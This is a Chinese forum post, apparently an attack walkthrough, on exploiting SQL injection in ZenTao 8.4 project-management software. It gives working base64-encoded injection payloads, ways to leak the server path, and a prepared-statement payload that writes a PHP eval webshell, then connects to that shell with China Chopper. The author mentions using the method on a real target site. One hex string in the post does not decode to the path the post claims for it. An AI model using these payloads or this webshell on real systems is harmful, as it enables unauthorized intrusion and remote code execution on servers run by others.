发这个是因为昨天遇到一个站。。。也是这个系统,目标站注入不出账号密码,拿不到账号密码只能写shell了.....
从星期六中午搞至星期天晚上~~终于在今天晚上6点多拿到了shell...........
在这期间也走了很多很多弯路。。。希望这篇帖子对大家有帮助。。共勉。。。。

首先看下大牛的分析文章。。。。
https://www.cnblogs.com/iamstudy/articles/chandao_pentest_1.html

然后~~~上干货,此处测试为本地环境,实际的渗透测试中请更换写shell的绝对路径。。

测试环境下载地址:https://www.zentao.net/download/80010.html


零、先获取版本号:
http://127.0.0.1:81/zentao/index.php?mode=getconfig
看下是否存在这个漏洞

8.4版本是存在这个漏洞的。。
banben.png
零点一、然后获取绝对路径
直接在http://127.0.0.1:81/zentao/后面随便输入什么就会爆出绝对路径。
http://127.0.0.1:81/zentao/getshell

lujin.png
得到绝对路径为:C:\111111111candao\xampp\zentao\

如果上面的方法暴不出路径,就用注入报错,爆路径。

eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMSwxIFBST0NFRFVSRSBBTkFMWVNFKHBvbHlnb24oaWQpLDEpIyIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0=

base64解码
{"orderBy":"order limit 1,1 PROCEDURE ANALYSE(polygon(id),1)#","num":"1,1","type":"openedbyme"}

一、EXP提交地址:
http://127.0.0.1:81/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=base64加密的EXP


写SHELL时必须加上Refer: http://127.0.0.1:81/zentao

1.png
二、注入显密码-EXP(这里的exp需要base64加密后才能提交):
{"orderBy":"order limit 1;#","num":"1,1","type":"openedbyme"}

加密后:
eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTsjIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ==

3.png

三、GETshell-EXP(还是需要base64加密):
{"orderBy":"order limit 1;SET @SQL=0x73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027433a2f31313131313131313163616e64616f2f78616d70702f7a656e74616f2f7777772f78696d63782e70687027;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}


其中有部分使用了MySQL的预处理查询绕过程序的过滤,0x加密部分解密(ASCII HEX解密)为:
即:
73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027443a2f6465706c6f796d656e742f78616d70702f7a656e74616f2f7777772f706173732e70687027

解密为(注意加密解密都不带0x,但是EXP中需要加上):
select '<?php @eval($_POST[1])?>' into outfile 'C:/111111111candao/xampp/zentao/www/ximcx.php'

最后提交的EXP为:
eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxNWQyOTNmM2UyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyNzQzM2EyZjMxMzEzMTMxMzEzMTMxMzEzMTYzNjE2ZTY0NjE2ZjJmNzg2MTZkNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjc4Njk2ZDYzNzgyZTcwNjg3MDI3O1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9


4.png

四、菜刀或者C刀链接:http://地址/zento/ximcx.php   密码为:1

5.png